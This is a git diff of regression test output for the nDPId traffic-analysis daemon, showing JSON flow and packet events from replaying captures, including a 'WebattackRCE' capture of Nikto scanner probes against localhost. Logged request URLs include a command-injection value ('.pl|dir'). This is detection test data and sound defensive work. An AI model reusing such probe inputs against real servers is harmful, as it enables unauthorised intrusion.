-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":71,"packets-processed":71,"total-skipped-flows":0,"total-l4-data-len":5450,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434606536630} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
packets captured/processed: 71/71 diff --git a/test/results/WebattackRCE.pcap.out b/test/results/WebattackRCE.pcap.out index db53c8115..93aaec7e6 100644 --- a/test/results/WebattackRCE.pcap.out +++ b/test/results/WebattackRCE.pcap.out 
@@ -1,3193 +1,3193 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackRCE.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1576420276577} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} 
-01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 